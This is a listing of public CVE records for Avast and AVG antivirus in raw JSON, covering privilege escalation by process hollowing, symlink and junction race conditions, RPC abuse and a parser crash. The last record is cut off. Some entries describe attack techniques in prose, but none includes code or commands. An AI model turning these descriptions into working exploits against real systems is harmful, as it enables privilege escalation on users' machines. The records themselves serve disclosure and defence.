Vulnerabilites related to avast - antivirus
CVE-2021-45337 (GCVE-0-2021-45337)
Vulnerability from cvelistv5
- n/a
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:39:20.371Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Privilege escalation vulnerability in the Self-Defense driver of Avast Antivirus prior to 20.8 allows a local user with SYSTEM privileges to gain elevated privileges by \"hollowing\" process wsc_proxy.exe which could lead to acquire antimalware (AM-PPL) protection." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-12-27T12:44:28", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2021-45337", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Privilege escalation vulnerability in the Self-Defense driver of Avast Antivirus prior to 20.8 allows a local user with SYSTEM privileges to gain elevated privileges by \"hollowing\" process wsc_proxy.exe which could lead to acquire antimalware (AM-PPL) protection." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0", "refsource": "MISC", "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "name": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5", "refsource": "MISC", "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-45337", "datePublished": "2021-12-27T12:44:28", "dateReserved": "2021-12-20T00:00:00", "dateUpdated": "2024-08-04T04:39:20.371Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2021-45339 (GCVE-0-2021-45339)
Vulnerability from cvelistv5
- n/a
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:39:20.486Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST0" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Privilege escalation vulnerability in Avast Antivirus prior to 20.4 allows a local user to gain elevated privileges by \"hollowing\" trusted process which could lead to the bypassing of Avast self-defense." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-12-27T12:57:43", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST0" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2021-45339", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Privilege escalation vulnerability in Avast Antivirus prior to 20.4 allows a local user to gain elevated privileges by \"hollowing\" trusted process which could lead to the bypassing of Avast self-defense." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0", "refsource": "MISC", "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "name": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST0", "refsource": "MISC", "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST0" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-45339", "datePublished": "2021-12-27T12:57:43", "dateReserved": "2021-12-20T00:00:00", "dateUpdated": "2024-08-04T04:39:20.486Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2023-1585 (GCVE-0-2023-1585)
Vulnerability from cvelistv5
- CWE-367 - Time-of-check Time-of-use (TOCTOU) Race Condition
Vendor | Product | Version | |||||||
---|---|---|---|---|---|---|---|---|---|
▼ | Avast | Avast Antivirus |
Version: 22.5 |
||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:57:23.319Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-1585", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2025-02-05T14:44:32.672944Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2025-02-05T14:44:52.972Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "Avast Antivirus", "vendor": "Avast", "versions": [ { "lessThanOrEqual": "22.10", "status": "affected", "version": "22.5", "versionType": "22.11" } ] }, { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "AVG Antivirus", "vendor": "AVG", "versions": [ { "lessThanOrEqual": "22.10", "status": "affected", "version": "22.5", "versionType": "22.11" } ] } ], "datePublic": "2023-04-20T19:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Avast and AVG Antivirus for Windows were susceptible to a Time-of-check/Time-of-use (TOCTOU) vulnerability in the Quarantine process, leading to arbitrary file/directory deletion. The issue was fixed with Avast and AVG Antivirus version 22.11 and virus definitions from 14 February 2023 or later. " } ], "value": "Avast and AVG Antivirus for Windows were susceptible to a Time-of-check/Time-of-use (TOCTOU) vulnerability in the Quarantine process, leading to arbitrary file/directory deletion. The issue was fixed with Avast and AVG Antivirus version 22.11 and virus definitions from 14 February 2023 or later. " } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-367", "description": "CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-19T18:40:42.602Z", "orgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "shortName": "NLOK" }, "references": [ { "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "source": { "discovery": "UNKNOWN" }, "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "assignerShortName": "NLOK", "cveId": "CVE-2023-1585", "datePublished": "2023-04-19T18:27:57.763Z", "dateReserved": "2023-03-22T22:17:48.081Z", "dateUpdated": "2025-02-05T14:44:52.972Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2024-5102 (GCVE-0-2024-5102)
Vulnerability from cvelistv5
- CWE-1284 - Improper Validation of Specified Quantity in Input
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-5102", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-06-11T20:42:23.759818Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-11T20:42:36.851Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-01T21:03:10.574Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "Antivirus", "vendor": "Avast", "versions": [ { "status": "affected", "version": "24.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "Naor Hodorov" } ], "datePublic": "2024-06-10T16:15:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "A sym-linked file accessed via the repair function in Avast Antivirus \u0026lt;24.2 on Windows may allow user to elevate privilege to delete arbitrary files or run processes as NT AUTHORITY\\SYSTEM.\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThe vulnerability exists within the \"Repair\" (settings -\u0026gt; troubleshooting -\u0026gt; repair) feature, which attempts to delete a file in the current user\u0027s AppData directory as NT AUTHORITY\\SYSTEM. A\u003c/span\u003e\u0026nbsp;low-privileged user can make a pseudo-symlink and a junction folder and point to a file on the system. This can provide a low-privileged user an Elevation of Privilege to win a race-condition which will re-create the system files and make Windows callback to a specially-crafted file which could be used to launch a privileged shell instance.\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThis issue affects Avast Antivirus prior to 24.2.\u003cbr\u003e\u003c/span\u003e\u003cbr\u003e" } ], "value": "A sym-linked file accessed via the repair function in Avast Antivirus \u003c24.2 on Windows may allow user to elevate privilege to delete arbitrary files or run processes as NT AUTHORITY\\SYSTEM.\u00a0The vulnerability exists within the \"Repair\" (settings -\u003e troubleshooting -\u003e repair) feature, which attempts to delete a file in the current user\u0027s AppData directory as NT AUTHORITY\\SYSTEM. A\u00a0low-privileged user can make a pseudo-symlink and a junction folder and point to a file on the system. This can provide a low-privileged user an Elevation of Privilege to win a race-condition which will re-create the system files and make Windows callback to a specially-crafted file which could be used to launch a privileged shell instance.\n\nThis issue affects Avast Antivirus prior to 24.2." } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV4_0": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "attackVector": "LOCAL", "baseScore": 7.3, "baseSeverity": "HIGH", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "userInteraction": "ACTIVE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H", "version": "4.0", "vulnAvailabilityImpact": "HIGH", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-1284", "description": "CWE-1284 Improper Validation of Specified Quantity in Input", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-06-10T16:48:40.652Z", "orgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "shortName": "NLOK" }, "references": [ { "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "source": { "discovery": "UNKNOWN" }, "title": "Elevation of Privelage via symlinked file in Avast Antivirus", "x_generator": { "engine": "Vulnogram 0.2.0" } } }, "cveMetadata": { "assignerOrgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "assignerShortName": "NLOK", "cveId": "CVE-2024-5102", "datePublished": "2024-06-10T16:15:56.581Z", "dateReserved": "2024-05-18T20:11:06.500Z", "dateUpdated": "2024-08-01T21:03:10.574Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2024-9481 (GCVE-0-2024-9481)
Vulnerability from cvelistv5
- CWE-787 - Out-of-bounds Write
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-9481", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-10-04T13:54:39.515335Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-10-04T13:54:47.530Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "platforms": [ "MacOS", "Windows", "Linux" ], "product": "Antivirus", "vendor": "AVG/Avast", "versions": [ { "lessThan": "\u003c 24092400", "status": "affected", "version": "24/Sep/2024", "versionType": "date" } ] } ], "credits": [ { "lang": "en", "type": "reporter", "value": "Mike Zhang, an independent security researcher" } ], "datePublic": "2024-10-04T12:13:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "An out-of-bounds write in the engine module in AVG/Avast Antivirus signature \u0026lt;24092400 released on 24/Sep/2024 on MacOS allows a malformed eml file to crash the application during file processing." } ], "value": "An out-of-bounds write in the engine module in AVG/Avast Antivirus signature \u003c24092400 released on 24/Sep/2024 on MacOS allows a malformed eml file to crash the application during file processing." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "CWE-787 Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-07T11:26:43.561Z", "orgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "shortName": "NLOK" }, "references": [ { "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "solutions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Upgrade to the latest version of virus definintions." } ], "value": "Upgrade to the latest version of virus definintions." } ], "source": { "discovery": "EXTERNAL" }, "title": "Out of Bounds write on scan of malformed eml file may crash the application", "x_generator": { "engine": "Vulnogram 0.2.0" } } }, "cveMetadata": { "assignerOrgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "assignerShortName": "NLOK", "cveId": "CVE-2024-9481", "datePublished": "2024-10-04T12:15:14.709Z", "dateReserved": "2024-10-03T14:29:34.815Z", "dateUpdated": "2024-10-07T11:26:43.561Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2019-11230 (GCVE-0-2019-11230)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
http://www.mcerlane.co.uk/CVE-2019-11230/ | x_refsource_MISC | |
http://www.securityfocus.com/bid/109344 | vdb-entry, x_refsource_BID |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T22:48:08.990Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.mcerlane.co.uk/CVE-2019-11230/" }, { "name": "109344", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/109344" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In Avast Antivirus before 19.4, a local administrator can trick the product into renaming arbitrary files by replacing the Logs\\Update.log file with a symlink. The next time the product attempts to write to the log file, the target of the symlink is renamed. This defect can be exploited to rename a critical product file (e.g., AvastSvc.exe), causing the product to fail to start on the next system restart." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-07-24T07:06:03", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://www.mcerlane.co.uk/CVE-2019-11230/" }, { "name": "109344", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/109344" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2019-11230", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Avast Antivirus before 19.4, a local administrator can trick the product into renaming arbitrary files by replacing the Logs\\Update.log file with a symlink. The next time the product attempts to write to the log file, the target of the symlink is renamed. This defect can be exploited to rename a critical product file (e.g., AvastSvc.exe), causing the product to fail to start on the next system restart." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.mcerlane.co.uk/CVE-2019-11230/", "refsource": "MISC", "url": "http://www.mcerlane.co.uk/CVE-2019-11230/" }, { "name": "109344", "refsource": "BID", "url": "http://www.securityfocus.com/bid/109344" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2019-11230", "datePublished": "2019-07-18T16:50:43", "dateReserved": "2019-04-14T00:00:00", "dateUpdated": "2024-08-04T22:48:08.990Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-10863 (GCVE-0-2020-10863)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
https://forum.avast.com/index.php?topic=232420.0 | x_refsource_MISC | |
https://forum.avast.com/index.php?topic=232423.0 | x_refsource_MISC | |
https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:14:15.706Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to trigger a shutdown via RPC from a Low Integrity process via TempShutDownMachine." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-01T16:55:48", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-10863", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to trigger a shutdown via RPC from a Low Integrity process via TempShutDownMachine." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://forum.avast.com/index.php?topic=232420.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "name": "https://forum.avast.com/index.php?topic=232423.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "name": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md", "refsource": "MISC", "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-10863", "datePublished": "2020-04-01T16:55:48", "dateReserved": "2020-03-23T00:00:00", "dateUpdated": "2024-08-04T11:14:15.706Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2023-1587 (GCVE-0-2023-1587)
Vulnerability from cvelistv5
- CWE-476 - NULL Pointer Dereference
Vendor | Product | Version | |||||||
---|---|---|---|---|---|---|---|---|---|
▼ | AVAST | Avast Antivirus |
Version: 22.5 |
||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:57:23.265Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-1587", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2025-02-05T16:15:02.891379Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2025-02-05T16:15:12.012Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "Avast Antivirus", "vendor": "AVAST", "versions": [ { "lessThanOrEqual": "22.10", "status": "affected", "version": "22.5", "versionType": "22.11" } ] }, { "defaultStatus": "unaffected", "platforms": [ "Windows" ], "product": "AVG Antivirus", "vendor": "AVG", "versions": [ { "lessThanOrEqual": "22.10", "status": "affected", "version": "22.5", "versionType": "22.11" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Avast and AVG Antivirus for Windows were susceptible to a NULL pointer dereference issue via RPC-interface. The issue was fixed with Avast and AVG Antivirus version 22.11" } ], "value": "Avast and AVG Antivirus for Windows were susceptible to a NULL pointer dereference issue via RPC-interface. The issue was fixed with Avast and AVG Antivirus version 22.11" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-19T18:39:52.636Z", "orgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "shortName": "NLOK" }, "references": [ { "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "source": { "discovery": "UNKNOWN" }, "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "assignerShortName": "NLOK", "cveId": "CVE-2023-1587", "datePublished": "2023-04-19T18:39:52.636Z", "dateReserved": "2023-03-22T22:17:54.665Z", "dateUpdated": "2025-02-05T16:15:12.012Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-10865 (GCVE-0-2020-10865)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
https://forum.avast.com/index.php?topic=232420.0 | x_refsource_MISC | |
https://forum.avast.com/index.php?topic=232423.0 | x_refsource_MISC | |
https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:14:15.676Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to make arbitrary changes to the Components section of the Stats.ini file via RPC from a Low Integrity process." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-01T17:02:07", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-10865", "STATE": "PUBLIC" 